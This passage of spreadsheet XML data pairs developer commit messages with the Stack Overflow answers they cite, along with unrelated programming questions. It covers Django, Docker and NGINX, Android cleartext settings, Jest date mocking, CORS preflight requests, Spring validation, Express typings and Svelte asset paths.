vs. relying on these field arguments is two-fold:
The aforementioned ups and downs with their reliability.  These arguments are heavily reliant on the way each type of database that Django knows how to interact with treats a date/time stamp field, and seems to break and/or change between every release. (Which I believe is the impetus behind the call to have them removed altogether).
The fact that they only work on DateField, DateTimeField, and TimeField, and by using this technique you are able to automatically populate any field type every time an item is saved.
Use
django.utils.timezone.now()
vs.
datetime.datetime.now()
, because it will return a TZ-aware or naive
datetime.datetime
object depending on
settings.USE_TZ
.
To address why the OP saw the error, I don't know exactly, but it looks like
created
isn't even being populated at all, despite having
auto_now_add=True
.  To me it stands out as a bug, and underscores item #1 in my little list above:
auto_now
and
auto_now_add
are flaky at best.</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am uploading a stack with the following compose:&lt;/p&gt;
&lt;pre class="lang-yaml prettyprint-override"&gt;&lt;code&gt;services: 
  code-server:
    container_name: code-server
    hostname: CodeServer
    image: lscr.io/linuxserver/code-server:latest
    volumes:
      #bind -compartilhado
      - ${HOME_PATH}/Documentos/Repositorio/stacks/ansible/ansible/ansible_cw5:/config/workspace/ansible_cw5
      - code-server-data:/data
    networks:
      nginx-local:
        ipv4_address: 10.120.4.3
    ports:
      - 8081:8443 #mapear portas no NGINX
    #sera reiniciado auto a menos que seja parado manualmente
    restart: unless-stopped
    depends_on:
      - ansible
    environment:
      - PUID=1000
      - PGID=1000
      - PASSWORD=${PASS} #para GUI
      - SUDO_PASSWORD=${ROOT_PASS} #senha de privilegio
      - PROXY_DOMAIN=${DOMAIN} #criar nome no DNS
      - DEFAULT_WORKSPACE=/config/workspace #diretorio de workspace
      - TZ=${TZ}
  ansible:
    container_name: ansible-v4
    hostname: Ansible
    image: ansible:v2
    volumes:
      #bind - compartilhado
      - ${HOME_PATH}/Documentos/Repositorio/stacks/ansible/ansible/ansible_cw5:/ansible/ansible_cw5:ro
    working_dir: /ansible/ansible_cw5
    networks:
      ansible-local:
        ipv4_address: 10.120.6.2
    environment:
      - TZ=America/Campo_Grande
    #container serÃ¡ sempre reiniciando sempre que parar
    restart: always
    stdin_open: true   
    tty: true 
    command: bash
  nginx_manager:
    container_name: nginx-proxy
    hostname: NGINX
    image: &amp;quot;jc21/nginx-proxy-manager:latest&amp;quot;
    volumes:
      - nginx-data:/data
      - nginx-letsencrypt:/etc/letsencrypt  # Volume necessÃ¡rio para certificados SSL/TLS
    networks:
      nginx-local:
        ipv4_address: 10.120.4.2
    ports:
      - 80:80 
      - 443:443 
      - 81:81 #gerencia NGINX
    restart: unless-stopped
    depends_on:
      - code-server
    environment:
      - INITIAL_ADMIN_EMAIL=${INITIAL_ADMIN_EMAIL}
      - INITIAL_ADMIN_PASSWORD=${INITIAL_ADMIN_PASSWORD}
#cria volumes persistentes
volumes:
  nginx-data:
  nginx-letsencrypt:
  code-server-data:
networks:
  nginx-local:
    driver: bridge
    ipam: 
      config:
        - subnet: 10.120.4.0/23
          ip_range: 10.120.4.0/24 
          gateway: 10.120.4.1
  ansible-local:
    driver: bridge
    ipam: 
      config:
        - subnet: 10.120.6.0/23
          ip_range: 10.120.6.0/24
          gateway: 10.120.6.1
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The idea is for Ansible to be accessible via the code-server, allowing configuration files to be edited through it, and for the code-server to be accessible via a local domain already set in the /etc/hosts file to resolve to the Nginx address (10.120.4.2).&lt;/p&gt;
&lt;p&gt;The problem is that when I access the domain in the browser, the login screen loads, but after logging in, a completely blank screen is displayed, and the URL changes to &lt;a href="http://code-server.gabriel/?folder=/config/workspace" rel="nofollow noreferrer"&gt;http://code-server.gabriel/?folder=/config/workspace&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;However, if I access the code-server using localhost:8081, I can access it normally without any issues. This seems to be some incorrect configuration in NGINX, but I havenâ€™t been able to figure out exactly what it could be.&lt;/p&gt;
&lt;p&gt;Iâ€™m using NGINX Proxy Manager, and hereâ€™s the only configuration I made for the host redirection:&lt;/p&gt;
&lt;p&gt;Domain Names: code-server.gabriel
Scheme: http
Forward Hostname / IP: 10.120.4.3
Forward Port: 8443&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C626</t>
  </si>
  <si>
    <t>Send login request to the backend and log response by showing a toast
- I enabled cleartext traffic in the manifest file because the backend server uses HTTP not HTTPS, for more information refer to https://stackoverflow.com/questions/45940861/android-8-cleartext-http-traffic-not-permitted</t>
  </si>
  <si>
    <t>According to
Network security configuration
-
Starting with Android 9 (API level 28), cleartext support is disabled
by default.
Also have a look at
Android M and the war on cleartext traffic
Codelabs explanation
from Google
Option 1 -
First try hitting the URL with
https://
instead of
http://
Option 2 -
Create file
res/xml/network_security_config.xml
-
&lt;?xml version="1.0" encoding="utf-8"?&gt;
&lt;network-security-config&gt;
    &lt;domain-config cleartextTrafficPermitted="true"&gt;
        &lt;domain includeSubdomains="true"&gt;api.example.com(to be adjusted)&lt;/domain&gt;
    &lt;/domain-config&gt;
&lt;/network-security-config&gt;
AndroidManifest.xml
-
&lt;?xml version="1.0" encoding="utf-8"?&gt;
&lt;manifest ...&gt;
    &lt;uses-permission android:name="android.permission.INTERNET" /&gt;
    &lt;application
        ...
        android:networkSecurityConfig="@xml/network_security_config"
        ...&gt;
        ...
    &lt;/application&gt;
&lt;/manifest&gt;
Option 3 -
android:usesCleartextTraffic Doc
AndroidManifest.xml
-
&lt;?xml version="1.0" encoding="utf-8"?&gt;
&lt;manifest ...&gt;
    &lt;uses-permission android:name="android.permission.INTERNET" /&gt;
    &lt;application
        ...
        android:usesCleartextTraffic="true"
        ...&gt;
        ...
    &lt;/application&gt;
&lt;/manifest&gt;
Also as
@david.s' answer
pointed out
android:targetSandboxVersion
can be a problem too -
According to
Manifest Docs
-
android:targetSandboxVersion
The target sandbox for this app to use. The higher the sandbox version
number, the higher the level of security. Its default value is 1; you
can also set it to 2. Setting this attribute to 2 switches the app to
a different SELinux sandbox. The following restrictions apply to a
level 2 sandbox:
The default value of
usesCleartextTraffic
in the Network Security    Config is false.
Uid sharing is not permitted.
So Option 4 -
If you have
android:targetSandboxVersion
in
&lt;manifest&gt;
then reduce it to
1
AndroidManifest.xml
-
&lt;?xml version="1.0" encoding="utf-8"?&gt;
&lt;manifest android:targetSandboxVersion="1"&gt;
    &lt;uses-permission android:name="android.permission.INTERNET" /&gt;
    ...
&lt;/manifest&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">Some weeks ago a friend of mine showed me a website where the architecture of the most popular websites is explained and described (youtube, amazon,facebook) and it also showed some interesting statistics about them.
Does anyone know where can I find this information?
</t>
  </si>
  <si>
    <t>C627</t>
  </si>
  <si>
    <t>Save login cookie issued and expiration dates
gh-253
https://stackoverflow.com/questions/28504545/how-to-mock-a-constructor-like-new-date
I need to save the cookie's date info server-side, so that someone can't
steal a cookie and send it with curls forever after to access the
victim's account.</t>
  </si>
  <si>
    <t>Update
: this answer is the approach for
jest &lt; version 26
see
this answer for recent jest versions
.
You can mock a constructor like new Date() using
jest.spyOn
as below:
test('mocks a constructor like new Date()', () =&gt; {
  console.log('Normal:   ', new Date().getTime())
  const mockDate = new Date(1466424490000)
  const spy = jest
    .spyOn(global, 'Date')
    .mockImplementation(() =&gt; mockDate)
  console.log('Mocked:   ', new Date().getTime())
  spy.mockRestore()
  console.log('Restored: ', new Date().getTime())
})
And the output looks like:
Normal:    1566424897579
Mocked:    1466424490000
Restored:  1566424897608
See
the reference project on GitHub
.
Note: If you are using TypeScript and you would encounter a compilation error,
Argument of type '() =&gt; Date' is not assignable to parameter of type '() =&gt; string'. Type 'Date' is not assignable to type 'string'
. In this case, a workaround is to use the
mockdate
library, which can be used to change when "now" is. See
this question
for more details.</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;At the end of the function queensAttack() I have two async functions (processBatch and processLargeArray) that return Promises to me, I still getting the object Promise as a result of calling the function, but as an output I just want the value from the Promise object.&lt;br /&gt;
So how do I get rid of this unwanted &amp;quot;Promise { &amp;lt;state&amp;gt;: &amp;quot;fulfilled&amp;quot;, &amp;lt;value&amp;gt;: 1449 }&amp;quot; output?&lt;/p&gt;
&lt;pre class="lang-js prettyprint-override"&gt;&lt;code&gt;function queensAttack(n, k, r_q, c_q, obstacles) {
  var ary = [];
  var count = 0;
  var finalResult = 0;
  //Calculating the number of moves for lines without obstacles
  if (k === 0 &amp;amp;&amp;amp; !obstacles) {
    count = ary[0] + ary[1] + ary[2] + ary[3] + (n - 1) * 2;
    return count;
  } else {
    var lent = obstacles.length;
    var batSize = lent / 10;
    //Declarations of accumulators vales of lines: F1, F2, D2, D1
    // --------------------------------------------------------------
    function qAttack(batch, p, lastBat) {
      //Counting the number of moves taking into account obstacles
    } //qattack6()
    // --------------------------------------------------------------
    let processBatch = async (batch, p, lastBat) =&amp;gt; {
      return new Promise((resolve, reject) =&amp;gt; {
        resolve(qAttack(batch, p, lastBat));
      });
    };
    let processLargeArray = async (bigAr, batchSize) =&amp;gt; {
      const lastBatch = lent - batchSize;
      for (let i = 0; i &amp;lt; bigAr.length; i += batchSize) {
        const batch = bigAr.slice(i, i + batchSize);
        try {
          let results = await processBatch(batch, i, lastBatch)
          finalResult = results
        } catch (error) {
          console.error(`Error processing batch ${i / batchSize + 1}:`, error);
        }
      } //for
      return finalResult
    };
    if (lent &amp;gt; 1000) {
      return processLargeArray(obstacles, batSize)
    } else {
      qAttack(obstacles, 1, 1);
    }
  } //else
}
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>C628</t>
  </si>
  <si>
    <t>Add social login button.
Reference:
https://freesgen.hashnode.dev/build-an-authentication-flow-with-auth0-and-vue3
https://auth0.github.io/auth0-spa-js/classes/auth0client.html
https://github.com/auth0/auth0-spa-js
Error:
Access to XMLHttpRequest at from origin 'http://localhost:3000' has been blocked by CORS policy:
Response to preflight request doesn't pass access control check: Redirect is not allowed for a preflight request.
https://stackoverflow.com/questions/10636611/how-does-access-control-allow-origin-header-work/10636765#10636765</t>
  </si>
  <si>
    <t>Access-Control-Allow-Origin
is a
CORS (cross-origin resource sharing) header
.
When Site A tries to fetch content from Site B,  Site B can send an
Access-Control-Allow-Origin
response header to tell the browser that the content of this page is accessible to certain origins. (An
origin
is a
domain, plus a scheme and port number
.)  By default, Site B's pages are
not accessible to any other origin
; using the
Access-Control-Allow-Origin
header opens a door for cross-origin access by specific requesting origins.
For each resource/page that Site B wants to make accessible to Site A, Site B should serve its pages with the response header:
Access-Control-Allow-Origin: http://siteA.com
Modern browsers will not block cross-domain requests outright.  If Site A requests a page from Site B, the browser will actually fetch the requested page
on the network level
and check if the response headers list Site A as a permitted requester domain.  If Site B has not indicated that Site A is allowed to access this page, the browser will trigger the
XMLHttpRequest
's
error
event and  deny the response data to the requesting JavaScript code.
Non-simple requests
What happens on the network level can be
slightly
more complex than explained above. If the request is a
"non-simple" request
, the browser first sends a data-less "preflight" OPTIONS request, to verify that the server will accept the request. A request is non-simple when either (or both) using:
An HTTP verb other than GET or POST (e.g. PUT, DELETE);
Non-simple request headers; the only simple requests headers are:
Accept
;
Accept-Language
;
Content-Language
;
Content-Type
(this is only simple when its value is
application/x-www-form-urlencoded
,
multipart/form-data
, or
text/plain
).
If the server responds to the OPTIONS preflight with appropriate response headers (
Access-Control-Allow-Headers
for non-simple headers,
Access-Control-Allow-Methods
for non-simple verbs) that match the non-simple verb and/or non-simple headers, then the browser sends the actual request.
Supposing that Site A wants to send a PUT request for
/somePage
, with a non-simple
Content-Type
value of
application/json
, the browser would first send a preflight request:
OPTIONS /somePage HTTP/1.1
Origin: http://siteA.com
Access-Control-Request-Method: PUT
Access-Control-Request-Headers: Content-Type
Note that
Access-Control-Request-Method
and
Access-Control-Request-Headers
are added by the browser automatically; you do not need to add them. This OPTIONS preflight gets the successful response headers:
Access-Control-Allow-Origin: http://siteA.com
Access-Control-Allow-Methods: GET, POST, PUT
Access-Control-Allow-Headers: Content-Type
When sending the actual request (after preflight is done), the behavior is identical to how a simple request is handled. In other words, a non-simple request whose preflight is successful is treated the same as a simple request (i.e., the server must still send
Access-Control-Allow-Origin
again for the actual response).
The browsers sends the actual request:
PUT /somePage HTTP/1.1
Origin: http://siteA.com
Content-Type: application/json
{ "myRequestContent": "JSON is so great" }
And the server sends back an
Access-Control-Allow-Origin
, just as it would for a simple request:
Access-Control-Allow-Origin: http://siteA.com
See
Understanding XMLHttpRequest over CORS
for a little more information about non-simple requests.</t>
  </si>
  <si>
    <t xml:space="preserve">I have a piece of data. At the moment, it's an XML file, but the architecture may change. So let's assume for the moment it's a C# Class.
When I store the data on disk or in the database, I need to add some sort of signature or fingerprint or checksum or whatever to ensure that no one can modify the data. The caveat: even an administrator or developer with access to all source code should not be able to modify it.
I assume that since someone with full code access can create a new signature easily (the signing needs to be done programatically, so no manual passphrase entry), the signature somehow needs to contain some additional data. Ideally I should be able to extract this data back from the signature, for example the date of signing and some strings.
My general approach is to use symmetric encryption. I generate a Hash, i.e. SHA-512 from all the fields and then encrypt that hash and my additional data with to get my signature, using the hash as password. To decrypt, my function would generate the hash from the actual data in the file, and try to decrypt the signature. That would not be tamper-proof though as it's easy to generate a signature where the signing date and additional information is still intact.
As I am not an expert on the field, I believe that I am trying to re-invent the wheel, and that it's not a very good wheel. I just wonder if there is some standard approach? I believe that part of my request is impossible (after all, if someone controls the entire environment, that person also controls the system time), but I still wonder how this is generally tackled?
</t>
  </si>
  <si>
    <t>C629</t>
  </si>
  <si>
    <t>Another big refactor to encapsulate meetings as an application and le
ave as much of that out of the project as possible. Going on Jacob Kaplan-Moss's descriptions of apps and projects: http://stackoverflow.com/a/2478193/123776</t>
  </si>
  <si>
    <t>Ignacio is right in pointing out that some of the applications you mention already exist. You should also look at projects like
Pinax
for other pluggable apps that can be a starting point for your own project.
Now to your question: A Django project is a collection of Django apps - that part you got right. The
Django book
defines it better:
"A project is a collection of settings for an instance of Django, including database configuration, Django-specific options and application-specific settings."
The
django book defines a Django app
as:
"A bundle of Django code, including models and views, that lives together in a single Python package and represents a full Django application."
But in a recent class with
Jacob Kaplan-Moss
I understood (mind that I'm not saying that is what he said!!!) that
a Django App is all about encapsulating common well defined behavior
. I also understood that
having many small apps is OK
- better than having one monolithic app that does everything - and that some apps are just there to provide templates, some just models, some a complete collection of templates, models and views.
Most of my projects - which are internal facing apps for our company - have a common pluggable app internally developed that is pretty much a collection of templates, css, javascript, etc; that tie the projects together with a common look and feel. I have no views or models in that pluggable app.
I have one pluggable app, also internally developed, that houses a bunch of models that are shared between multiple projects. The models represent common database tables that are used by several different apps and having them duplicated in each of the apps would
violate DRY
.
Some good example of apps:
authentication (Django already has a standard authentication app)
gravatar support (Pinax has it)
tagging (Several options available, Pinax has one)
helpdesk (we developed one internally)
All of the above are tackling one logical problem. They don't try to be a do-it-all solution... The Gravatar app doesn't provide OpenID support (there is another app for OpenID), and my helpdesk internal app does not provide authentication (it uses the default django app for that).
A bad example of a Django app would be one that implemented authentication, openid support, helpdesk, and project tracking. Why would that be bad? Because now if you want to reuse your authentication app you have to extricate some models, some views, some templates from your all-encompassing app. If you decide that OpenId support is a must for your next project, you will have to go through the code of this behemoth of an app and find out what parts are relevant.
A good Django app provides one logical set of operations and does it well.</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I need to create a archive template on Elementor.&lt;/p&gt;
&lt;p&gt;This template will have three sections loading posts from the same category.&lt;/p&gt;
&lt;p&gt;So, I need to use the loop grid widget three times at the same template and guarantee all sections won't have duplicate posts. The loop grid supports to customize the loop item so I really need to use this widget instead another.&lt;/p&gt;
&lt;p&gt;This is what a I need:&lt;/p&gt;
&lt;p&gt;&lt;a href="https://i.sstatic.net/OZzh7o18.jpg" rel="nofollow noreferrer"&gt;What I need&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;I'm trying to use the elementor/query/{$query_id} hook to do it as they use the native WP_Query from WordPress (this what they on their own documentation).&lt;/p&gt;
&lt;p&gt;The problem is that I can't find a way where I store the post ids from the first loop grid widget, so the second can load different posts.&lt;/p&gt;
&lt;p&gt;I already did a print_r($query); to find out anything there but until my knowledge goes I didn't find nothing there.&lt;/p&gt;
&lt;p&gt;For some reason wp_list_pluck( $query-&amp;gt;posts, 'ID' ) doesn't work. The array where I try to merge this returns empty.&lt;/p&gt;
&lt;p&gt;I hope someone could help me to manage this litte challenge and of course find errors on my code.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;function avoid_duplicate_posts( $query ) {
    $excluded_ids = (array) get_query_var( 'excluded_posts' );
    $query-&amp;gt;set( 'posts_per_page', 3 ); // This will be handle later as each widhet will load different number of posts
    $query-&amp;gt;set( 'post__not_in', $excluded_ids ); // Deletes already displayed posts
    $query-&amp;gt;set( 'orderby', 'date' ); 
    $query-&amp;gt;set( 'order', 'DESC' ); 
    // Add the current query posts to the excluded list
    $excluded_ids = array_merge( $excluded_ids, wp_list_pluck( $query-&amp;gt;posts, 'ID' ) );
    set_query_var( 'excluded_posts', $excluded_ids );
}
add_action( 'elementor/query/avoid_duplicate', 'avoid_duplicate_posts' );
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>C63</t>
  </si>
  <si>
    <t>SCC363-24 Login data validation
Added validation to ensure username and emails are unique.
Added line in application.properties which stops a bug when validating. See here on the https://stackoverflow.com/questions/62537836/can-spring-boot-be-configured-to-check-unique-constraints-in-my-rest-controller double invocation</t>
  </si>
  <si>
    <t>You may create a custom annotation to validate the email constrains or may add validation in the service layer manually and can throw the exception.
@Column
For @Column, make sure unique constrain is added for email column in the database. Try to drop and recreate the database using spring.jpa.hibernate.ddl-auto=create and check the unique constrain
/**
 * (Optional) Whether the column is a unique key.  This is a 
 * shortcut for the &lt;code&gt;UniqueConstraint&lt;/code&gt; annotation at the table 
 * level and is useful for when the unique key constraint 
 * corresponds to only a single column. This constraint applies 
 * in addition to any constraint entailed by primary key mapping and 
 * to constraints specified at the table level.
 */
boolean unique() default false;
Custom annotation
UniqueEmail.java
import javax.validation.Constraint;
import javax.validation.Payload;
import java.lang.annotation.ElementType;
import java.lang.annotation.Retention;
import java.lang.annotation.RetentionPolicy;
import java.lang.annotation.Target;
@Constraint(validatedBy = UniqueEmailValidator.class)
@Target(ElementType.FIELD)
@Retention(RetentionPolicy.RUNTIME)
public @interface UniqueEmail {
    String message() default "Email address is already registered";
    Class&lt;?&gt;[] groups() default { };
    Class&lt;? extends Payload&gt;[] payload() default { };
}
UniqueEmailValidator.java
import org.springframework.beans.factory.annotation.Autowired;
import org.springframework.stereotype.Component;
import javax.validation.ConstraintValidator;
import javax.validation.ConstraintValidatorContext;
@Component
public class UniqueEmailValidator implements ConstraintValidator&lt;UniqueEmail, String&gt; {
    @Autowired UserRepository userRepository;
    @Override
    public boolean isValid(String email, ConstraintValidatorContext context) {
        return !userRepository.existsByEmail(email);
    }
}
User.java
@UniqueEmail
@NotBlank(message = "Email is mandatory")
@Column(unique=true)
private String email;
UPDATE
UniqueEmailValidator
You have slightly misconfigured isValid method, we should return true if the email does not exist and false for email is already exists
Change
return userRepository.findByEmail(email) != null;
To
return userRepository.findByEmail(email) == null;
Annotation get invoked twice
You may need to add the property in application.properties (src/main/resources, src/main/test)
spring.jpa.properties.javax.persistence.validation.mode=none
validation-mode
By default, Bean Validation (and Hibernate Validator) is activated. When an entity is created, updated (and optionally deleted), it is validated before being sent to the database. The database schema generated by Hibernate also reflects the constraints declared on the entity.
You can fine-tune that if needed:
AUTO: if Bean Validation is present in the classpath, CALLBACK and DDL are activated.
CALLBACK: entities are validated on creation, update and deletion. If no Bean Validation provider is present, an exception is raised at initialization time.
DDL: (not standard, see below) database schemas are entities are validated on creation, update and deletion. If no Bean Validation provider is present, an exception is raised at initialization time.
NONE: Bean Validation is not used at all
Test
UserControllerIntegrationTest#registerWithNonUniqueEmail You may remove assertEquals("Failed", responseEntity.getBody()) as response string be different for bad request.</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have extended the native Express Request object using&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;// types/express.d.ts
    import { User } from '../UserTypes'; // Ensure this is correct
    declare global {
      namespace Express {
        interface Request {
          user: User;
        }
      }
    }
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;but my code throws error from file&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;import { NextFunction, Request, Response } from 'express';
import jwt from 'jsonwebtoken';
import { prisma } from '../prismaClient';
const authMiddleware = async (
  req: Request,
  res: Response,
  next: NextFunction,
): Promise&amp;lt;any&amp;gt; =&amp;gt; {
  const token = req.cookies.jwt;
  if (!token) {
    return res.status(401).json({ message: &amp;quot;Unauthorized: No token provided&amp;quot; });
  }
  try {
    const decoded = jwt.verify(token, process.env.JWT_SECRET as string) as {
      id: string;
    };
    const credential = await prisma.credential.findUnique({
      where: { id: decoded.id },
      include: {
        student: true,
        faculty: true,
        admin: true,
      },
    });
    if (!credential) {
      return res.status(401).json({ message: &amp;quot;Unauthorized: User not found&amp;quot; });
    }
    req.user = {
      id: credential.id,
      role: credential.role,
      student: credential.student,
      faculty: credential.faculty,
      admin: credential.admin,
    };
    next();
  } catch (error) {
    console.error(&amp;quot;JWT verification or database error:&amp;quot;, error);
    return res.status(401).json({ message: &amp;quot;Unauthorized: Invalid token&amp;quot; });
  }
};
export default authMiddleware;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;when i try to run the development server using &amp;quot;nodemon index.ts&amp;quot; or &amp;quot;node-ts index.ts&amp;quot;
It doesnt throw this error if i build it into JS and run the build but only when i run TS directly. It doesnt even throw any error when i run &amp;quot;tsc --noEmit&amp;quot;&lt;/p&gt;
&lt;p&gt;This is my modified tsconfig.json&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;{
  &amp;quot;compilerOptions&amp;quot;: {
    &amp;quot;target&amp;quot;: &amp;quot;es2016&amp;quot;,
    &amp;quot;module&amp;quot;: &amp;quot;commonjs&amp;quot;,
    &amp;quot;outDir&amp;quot;: &amp;quot;./dist&amp;quot;,
    &amp;quot;resolveJsonModule&amp;quot;: true,
    &amp;quot;allowSyntheticDefaultImports&amp;quot;: true,
    &amp;quot;esModuleInterop&amp;quot;: true,
    &amp;quot;forceConsistentCasingInFileNames&amp;quot;: true,
    &amp;quot;strict&amp;quot;: true,
    &amp;quot;noImplicitAny&amp;quot;: true,
    &amp;quot;strictNullChecks&amp;quot;: true,
    &amp;quot;skipLibCheck&amp;quot;: true,
    &amp;quot;rootDir&amp;quot;: &amp;quot;./src&amp;quot;,
    &amp;quot;typeRoots&amp;quot;: [&amp;quot;./node_modules/@types&amp;quot;, &amp;quot;./src/types&amp;quot;],
    &amp;quot;types&amp;quot;: [&amp;quot;node&amp;quot;, &amp;quot;express&amp;quot;]
  },
  &amp;quot;exclude&amp;quot;: [&amp;quot;src/scripts&amp;quot;]
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Error Thrown is :-&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;PS C:\Programming Workspaces\WebDev\ElectiveManagementSystem\server&amp;gt; npm run dev
&amp;gt; server@1.0.0 dev
&amp;gt; ts-node src/index.ts
C:\Programming Workspaces\WebDev\ElectiveManagementSystem\server\node_modules\ts-node\src\index.ts:859
    return new TSError(diagnosticText, diagnosticCodes, diagnostics);
           ^
TSError: â¨¯ Unable to compile TypeScript:
src/middleware/authMiddleware.ts:34:9 - error TS2339: Property 'user' does not exist on type 'Request&amp;lt;ParamsDictionary, any, any, ParsedQs, Record&amp;lt;string, any&amp;gt;&amp;gt;'.
34     req.user = {
           ~~~~
    at createTSError (C:\Programming Workspaces\WebDev\ElectiveManagementSystem\server\node_modules\ts-node\src\index.ts:859:12)
    at reportTSError (C:\Programming Workspaces\WebDev\ElectiveManagementSystem\server\node_modules\ts-node\src\index.ts:863:19)
    at getOutput (C:\Programming Workspaces\WebDev\ElectiveManagementSystem\server\node_modules\ts-node\src\index.ts:1077:36)
    at Object.compile (C:\Programming Workspaces\WebDev\ElectiveManagementSystem\server\node_modules\ts-node\src\index.ts:1433:41)
    at Module.m._compile (C:\Programming Workspaces\WebDev\ElectiveManagementSystem\server\node_modules\ts-node\src\index.ts:1617:30)
    at Module._extensions..js (node:internal/modules/cjs/loader:1435:10)
    at Object.require.extensions.&amp;lt;computed&amp;gt; [as .ts] (C:\Programming Workspaces\WebDev\ElectiveManagementSystem\server\node_modules\ts-node\src\index.ts:1621:12)
    at Module.load (node:internal/modules/cjs/loader:1207:32)
    at Function.Module._load (node:internal/modules/cjs/loader:1023:12)
    at Module.require (node:internal/modules/cjs/loader:1235:19) {
  diagnosticCodes: [ 2339 ]
}
PS C:\Programming Workspaces\WebDev\ElectiveManagementSystem\server&amp;gt; 
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;this is where i am using the authMiddleware.ts&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;import express from 'express';
import BranchController from '../controllers/BranchController';
import { authorizeRoles } from '../middleware/roleMiddleware';
import { UserRole } from '@prisma/client';
const router = express.Router();
/**
 * @swagger
 * tags:
 *   name: Branches
 *   description: API endpoints for managing branches
 */
/**
 * @swagger
 * /branches:
 *   get:
 *     summary: Get all branches
 *     tags: [Branches]
 *     parameters:
 *       - in: query
 *         name: departmentId
 *         schema:
 *           type: string
 *         description: Optional department ID to filter branches
 *     responses:
 *       200:
 *         description: Successfully retrieved all branches
 *         content:
 *           application/json:
 *             schema:
 *               type: array
 *               items:
 *                 type: object
 *       500:
 *         description: Unable to fetch branches
 */
router.get(
  &amp;quot;/&amp;quot;,
  authorizeRoles([UserRole.ADMIN]),
  BranchController.getAllBranches,
);
/**
 * @swagger
 * /branches/{id}:
 *   get:
 *     summary: Get a branch by ID
 *     tags: [Branches]
 *     parameters:
 *       - in: path
 *         name: id
 *         required: true
 *         schema:
 *           type: string
 *         description: The branch ID
 *     responses:
 *       200:
 *         description: Successfully retrieved the branch
 *         content:
 *           application/json:
 *
 *       404:
 *         description: Branch not found
 *       500:
 *         description: Unable to fetch branch
 */
router.get(
  &amp;quot;/:id&amp;quot;,
  authorizeRoles([UserRole.ADMIN]),
  BranchController.getBranchByID,
);
export default router;
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>C630</t>
  </si>
  <si>
    <t>Create a Change Password Servlet and Email Utility
[Create Change Password page by JSP &amp; Servlet](https://stackoverflow.com/questions/13776794/create-change-password-page-by-jsp-servlet)</t>
  </si>
  <si>
    <t>An update query must be executed with
executeUpdate()
, not
executeQuery()
.
There are other problems in your code:
you should use prepared statements instead of concatenation. This will avoid SQL injection attacks, and avoid errors if the password contains a single quote, for example.
you should never use GET to post a form containing a password. This makes the password appear in clear text in the browser adress bar
you should respect Java naming conventions: methods and variables start with a lower-case letter
you should always close the connection in a finally block. Else, after N executions, your connection pool won't have any available connection anymore, and you'll have to restart the application every minute
You should never catch Exception and never never ignore the exception completely.
if (flag == true)
is ugly. Use
if (flag)
A given HTML pages should never have two elements with the same
id
attribute. An ID is supposed to be unique.
you don't use the CPassword parameter at all.
the methods should be private by default, unless you have a very good reason to make them public.</t>
  </si>
  <si>
    <t xml:space="preserve">I am trying to install windows server operating system on a DELL optiplex desktop GX600 series, 
During the installation, In the first step I was asked to choose between:
1)Windows 2008 X86 Architecture
OR
2)Windows 2008 X64 Architecture
Now, how do I determine what architecture my Dell desktop is built on and which OS installation option should I choose?
</t>
  </si>
  <si>
    <t>C631</t>
  </si>
  <si>
    <t>One way of doing things would be to get credentials via env vars.
Check this : https://stackoverflow.com/questions/17324472/how-to-securely-store-database-password-in-python</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;First time using Svelte and I'm just using a simple img tag seen below:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;            &amp;lt;img src=&amp;quot;src/lib/assets/todo_list.png&amp;quot; alt=&amp;quot;todo list&amp;quot;/&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;When I run &lt;em&gt;npm run dev&lt;/em&gt;, it shows up locally fine in browser. When I run &lt;em&gt;npm run build&lt;/em&gt; and then &lt;em&gt;npm run preview&lt;/em&gt;. The preview environment can't find the image.&lt;/p&gt;
&lt;p&gt;[&lt;img src="https://i.sstatic.net/oTioC3VA.png" alt="can't find image1" /&gt;&lt;/p&gt;
&lt;p&gt;What am I missing? Below is the folder directory. &lt;a href="https://i.sstatic.net/787d38eK.png" rel="nofollow noreferrer"&gt;&lt;img src="https://i.sstatic.net/787d38eK.png" alt="Directory" /&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;Solutions tried:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;&lt;p&gt;Creating my own public/static/ directory and putting the image there&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;&lt;p&gt;importing seen below, the image will appear for one brief second and then the rest of my site would go blank.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;import userSrc from '$lib/assets/todo_list.png';
&amp;lt;img class=&amp;quot;mx-auto h-screen&amp;quot; src={userSrc} alt=&amp;quot;BONSAI&amp;quot;/&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;/li&gt;
&lt;li&gt;&lt;p&gt;I have tried changing the src to:&lt;/p&gt;
&lt;p&gt;src=&amp;quot;src/lib/assets/todo_list.png&amp;quot;&lt;/p&gt;
&lt;p&gt;src=&amp;quot;./lib/assets/todo_list.png&amp;quot;&lt;/p&gt;
&lt;p&gt;src=&amp;quot;/lib/assets/todo_list.png&amp;quot;&lt;/p&gt;
&lt;p&gt;src=&amp;quot;lib/assets/todo_list.png&amp;quot;&lt;/p&gt;
&lt;p&gt;src=&amp;quot;./assets/todo_list.png&amp;quot;&lt;/p&gt;
